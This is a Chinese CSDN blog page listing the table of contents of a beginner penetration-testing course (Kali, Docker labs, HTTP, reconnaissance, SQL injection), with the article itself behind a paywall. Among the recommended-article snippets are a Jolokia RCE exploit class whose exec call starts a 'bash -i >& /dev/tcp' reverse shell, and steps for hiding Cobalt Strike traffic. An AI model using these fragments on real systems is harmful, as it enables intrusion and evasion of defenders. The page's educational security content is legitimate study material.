万字渗透测试入门知识点,自学查漏补缺

最新推荐文章于 2023-11-29 20:42:01 发布
最新推荐文章于 2023-11-29 20:42:01 发布
阅读量1k 收藏 1
点赞数
文章标签: 1024程序员节 网络安全 安全性测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yjwangan/article/details/127493192
版权

后续慢慢更新各个知识点的内容~

知识点目录

渗透工具环境安装

Java环境安装

  • Windows安装Java
  • Linux安装Java
  • MacOS安装Java

Python环境安装

  • Windows安装Python2/3
  • linux安装python2/3
  • MacOS安装2/3

Kali Linux配置与使用

  • VMware软件安装
  • 下载VMware
  • 安装VMware
  • 激活VMware

VMware安装kali

  • kali简介
  • kali下载
  • kali安装

VMware虚拟网络编辑

  • NAT模式
  • 桥接模式
  • 仅主机模式

Linux使用基础

  • Linux简介
  • Linux目录结构
  • Linux文件属性
  • 文件目录管理
  • VIM编辑器

Kali linux配置

  • 用户配置
  • 网络配置
  • APT源
  • APT使用
  • Kali汉化
  • 配置python-pip
  • Git使用
  • SSH登录

kali工具

  • 信息手机
  • 漏洞分析
  • web应用分析
  • 数据库评估
  • 密码攻击
  • 无线攻击
  • 逆向工程
  • 利用工具
  • 嗅探&欺骗
  • 后渗透攻击
  • 取证工具
  • 报告工具
  • 社会工程学工具

内网靶场虚拟环境搭建

  • 多层内网环境搭建
  • 域环境搭建

云服务器

云服务器介绍
云服务器选购指南

Docker

  • docker简介
  • docker安装
  • docker基础操作
    • Docker镜像操作
    • docker容器操作
    • docker容器保存为镜像
    • docker镜像备份与迁移
  • docker操作实战
    • docker搭建漏洞靶场
      • vulhub
      • vulnapp
      • vulfocus

渗透测试基础

网络协议基础

  • 网络协议分成详解

    • 应用层
    • 传输层
    • 网络层
    • 数据链路层
    • 物理层

  • IP详解

    • IP基本认识
      • IP的作用
      • IP与MAC的关系
    • IP地址基础知识
      • IP地址的定义
      • IP地址的分类
      • 公有IP地址与私有IP地址
      • IP地址与路由控制
    • IP协议相关技术
      • DNS-域名解析
      • ARP与RARP协议
      • DHCP-动态获取IP地址
      • NAT-网络地址转换
      • ICMP-互联网控制报文协议

  • HTTP详解

    • HTTP基础知识
      • HTTP简介
      • 统一资源定位符(URL)
      • 统一资源标志符(URI)
    • HTTP请求详解
      • HTTP请求行
        • HTTP请求方法
      • HTTP请求头部字段
        • HOST
        • Content-Length
        • Connection
        • Content-Type
        • Conrtent-Encoding
      • 空行
      • HTTP请求正文
    • HTTP相应详解
      • HTTP相应状态行
        • 状态码
        • 1XX
        • 2XX
        • 3XX
        • 4XX
        • 5XX
      • HTTP相应头部字段
      • 空行
      • HTTP相应正文
    • HTTP请求方法详解
      • GET
      • POST
      • HEAD
      • PUT
      • DELETE
      • TRACE
      • OPTIONS
      • CONNECT
      • PATCH
    • HTTP与HTTPS
      • 区别
      • HTTPS优点
    • 分析HTTP请求响应
      • BurpSuite简介
      • BurpSuite安装
      • BurpSuite使用
        • Proxy简介
        • Proxy设置
          • BurpSuite设置
          • 浏览器设置
        • HTTPS抓包
          • HTTPS证书安装

信息收集

  • 信息收集简介
  • 域名信息收集
    • 域名介绍
    • 域名分类
    • Whois
    • 备案信息
    • Whois反查
    • 子域名
      • 子域名简介
      • GoogleHacking
      • 子域名接口
      • SSL证书查询
      • JS文件发现子域名
      • 子域名收集工具
  • IP、端口信息收集
    • IP信息收集
    • 端口信息收集
    • 常见端口介绍
    • 端口扫描-NMAP
  • 网站信息收集
    • 操作心态
    • 网站服务
    • WEB容器类型
    • 脚本类型
    • 数据库类型
    • CMS识别
    • 敏感文件目录
    • Github泄露
    • .git泄露
    • .svn泄露
    • 网站备份文件
    • 目录探测
    • 网站WAF识别

WEB安全基础

  • 环境搭建
    • WAMP环境搭建
    • LAMP环境搭建
  • SQL注入漏洞详解
    • SQL简介
      • 数据库简介
      • 常用SQL语句
      • MySQL基础
      • MySQL系统表
    • SQL注入简介
      • SQL注入原理
      • SQL注入危害
      • SQL注入判断
    • SQL注入分类
      • GET显错注入
      • POST显错注入
      • GET盲注
      • POST盲注
      • 报错注入
      • 延时注入
      • Header注入
      • Cookie注入
      • 宽字节注入
      • 堆叠注入
      • MySQL读取文件
    • SQL注入工具-SQLMAP
      • SQLMAP简介
      • SQLMAP注入模式
      • SQLMAP参数详解
      • SQLMAP–os–shell原理
      • SQLMAP实例
  • 文件上传漏洞详解
    • 文件上传简介
      • 什么是文件上传
      • 什么是文
最低0.47元/天 解锁文章
蚁景网安
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Springboot之actuator配置不当漏洞RCE(jolokia)
墨痕诉清风的博客
10-25 4585
日穿扫描扫到一个spring boot actuator 可以看到有jolokia这个端点,再看下jolokia/list,存在type=MBeanFactory 关键字 可以使用jolokia-realm-jndi-rce具体步骤如下 先用python3开一个web服务 python3 -m http.server 8080 编译java利用代码 /** * javac -source 1.5 -target 1.5 JNDIObject.java * * Buil..
渗透测试笔记】之【内网渗透——CS流量隐蔽】
AA8j的博客
11-22 4585
文章目录1. 端口特征2. 证书特征2. 配置CDN3. 生成自定义配置文件4. 效果演示 1. 端口特征 vim teamserver 将默认端口修改: -Dcobaltstrike.server_port=64444 2. 证书特征 删除原有证书(第一次启动会生成cobaltstrike.store),创建新证书cobaltstrike.store rm cobaltstrike.store keytool -keystore cobaltstrike.store -storepass 12345
Spring Boot jolokia 配置不当导致RCE漏洞
Bird&Bird
03-16 3974
访问 /jolokia/list 接口,查看是否存在 ch.qos.logback.classic.jmx.JMXConfigurator 和 reloadByURL 关键词。根据实际情况修改 springboot-realm-jndi-rce.py 脚本中的目标地址,RMI 地址、端口等信息,然后在自己控制的服务器上运行。普通 JNDI 注入受目标 JDK 版本影响,jdk < 6u201/7u191/8u182/11.0.1(LDAP),但相关环境可绕过。环境运行起来后,访问一下/jolokia接口。
内网渗透隐藏通信隧道技术
qq_48904485的博客
04-27 5198
一、隐藏通信隧道基础知识 1、隐藏通信隧道概述 一般的网络通信,先在两台机器之间建立TCP连接,然后进行正常的数据通信。在知道IP地址的情况下,可以直接发送报文;如果不知道IP地址,就需要将域名解析成IP地址。在实际的网络中,通常会通过各种边界设备、软/硬件防火墙甚至人侵检测系统来检查对外连接的情况,如果发现异常,就会对通信进行阻断。 这里的隧道,是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或者端口进行封装,然后穿过防火墙,与对方进行通信。当被封装的数据包到达目的地时,将数据
渗透框架进阶之流量隐藏
weixin_56378389的博客
06-15 511
msf,cs流量隐藏
Apache ActiveMQ jolokia 远程代码执行漏洞
最新发布
时光不老的博客
11-29 2117
该漏洞存在于Jolokia服务的请求处理方式中,结合ActiveMQ的配置不当和Java的高级功能,允许已认证的用户通过发送特定格式的HTTP请求来执行危险操作。ActiveMQ的内部配置允许org.jolokia.http.AgentServlet处理来自/api/jolokia的请求,而没有足够的安全检查来防止恶意操作。
自学渗透测试 学习笔记 思维导图
04-18
此资源为本人自学渗透测试过程中做的一些笔记,为思维导图模式,用XMind ZEN 可打开,主要涉及到渗透测试的基本步骤,所用到的工具和渗透方法,ruby语言的简单学习,近源渗透测试的详细学习等,整张思维导图主题个数...
网络安全自学渗透测试所需要的所有安装包合集
11-06
网络安全渗透测试环境搭建需要的各种安装包。包括vmware,server2008 r2,kali,phpstudy,dvwa靶场,谷歌浏览器,vmtools安装需要的v9c。 整个个安装包的适用场景是网络安全自学中所需要的环境搭建的基础安装包。搭建...
TOGAF9.2 考试精髓知识点PPT
11-07
我学习TOGAF9.2备考时做的ppt,都是干货,里面标记出了考点,供大家参考。开源,可自由编辑、分发。
软件测试入门自学书籍PFD下载
10-17
《软件测试入门自学书籍》是一本专为初学者设计的指南,旨在帮助读者全面了解软件测试的基础知识,并通过实例深入理解测试原理与实践。作者在书中分享了丰富的个人经验与深刻的理解,使得这本书不仅理论扎实,而且...
数据结构与算法知识点万字总结.docx
11-27
以下是其中的关键知识点: 首先,数据结构三要素包括:非数值的操作对象、对象之间的关系和数据对象上操作的实现。这定义了数据结构的核心属性,帮助我们理解如何组织和操作数据。 数据结构分为逻辑结构和存储结构...
SpringBoot漏洞
weixin_51151498的博客
01-19 1万+
spring漏洞
Jolokia RCE漏洞利用
baidu_38844729的博客
11-30 3066
利用步骤 1、编译java利用代码,将其命名为Exploit.java,然后编译生成class文件:javac Exploit.java public class Exploit { public ExportObject() { try { System.setSecurityManager(null); java.lang.Runtime.getRuntime().exec("sh -c $@|sh . echo `bash -i >& /dev/tcp
网络攻防作业——学习使用cobaltStrike
yyy7654321的博客
06-28 955
生成Windows下可执行木马(一个有英语版的图,一个中文版的),放在指定的地方。在放在window系统的电脑中运行软件,在弹出阻止消息的时候点击信任运行。3.利用Cobaltstrike生成攻击后门,并通过“文件托管” 进行网络共享下载该后门,运行后门上线。2.利用Cobaltstrike生成攻击后门,并通过2种网络共享下载该后门,运行后门上线;1.利用Cobaltstrike生成攻击后门,并通过“文件托管” 进行网络共享。实验工具:VMware,edge,cs。1.登录cs,并生成后面放在指定路径。
Cobaltstrike简介、安装及简单使用
热门推荐
LUOBIKUN的博客
09-21 1万+
Cobaltstrike简介、安装及简单使用 工具分享: CS4.0 链接:https://pan.baidu.com/s/1kCxYpdjgVWSSgEFObU0nLw 提取码:38pz 工具介绍 Cobalt Strike 是一款使用java编写,C / S架构的商业渗透软件,适合多人进行团队协作,可模拟APT做模拟对抗,进行内网渗透,是一个为对手模拟和红队行动而设计的平台,主要用于执行有目标的攻击和模拟高级威胁者的后渗透行动。 组成 Cobalt Strike 分为客户端组件和服务器组件。 服务器组件
SpringBoot历史漏洞复现
weixin_53747497的博客
04-01 5972
Spring框架为开发Java应用程序提供了全面的基础架构支持。它包含一些很好的功能,如依赖注入和开 箱即用的模块,如:Spring JDBC 、Spring MVC 、Spring Security、 Spring AOP 、Spring ORM 、 Spring Test,这些模块缩短应用程序的开发时间,提高了应用开发的效率例如,在Java Web开发的早 期阶段,我们需要编写大量的代码来将记录插入到数据库中。
Springboot远程代码执行漏洞复现(CVE-2022-22965)
初岄的博客
07-09 1416
Springboot远程代码执行漏洞复现(CVE-2022-22965)
【合集】常见中间件漏洞
hackzkaq的博客
12-03 2962
1. IIS 1. PUT漏洞 用户配置不当,exp:https://github.com/hackping/HTTPMLScan.git 2. 短文件名猜解 IIS的短文件名机制,可以暴力猜解短文件名,访问构造的某个存在的短文件名,会返回404,访问构造的某个不存在的短文件名,返回400。 exp:https://github.com/WebBreacher/tilde_enum 3.远程代码执行(CVE-2017-7269)) **exp**:https://github.com/zcgonv
网络安全入门:破解边界基础与高级渗透测试
7. **实战训练**:CTP课程提供实践环境,让学员有机会在受控的环境中应用所学知识,模拟真实的渗透测试过程。 8. **安全最佳实践**:除了教授攻击技术,书中还涵盖了防御策略,教导读者如何强化系统防御,避免成为...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值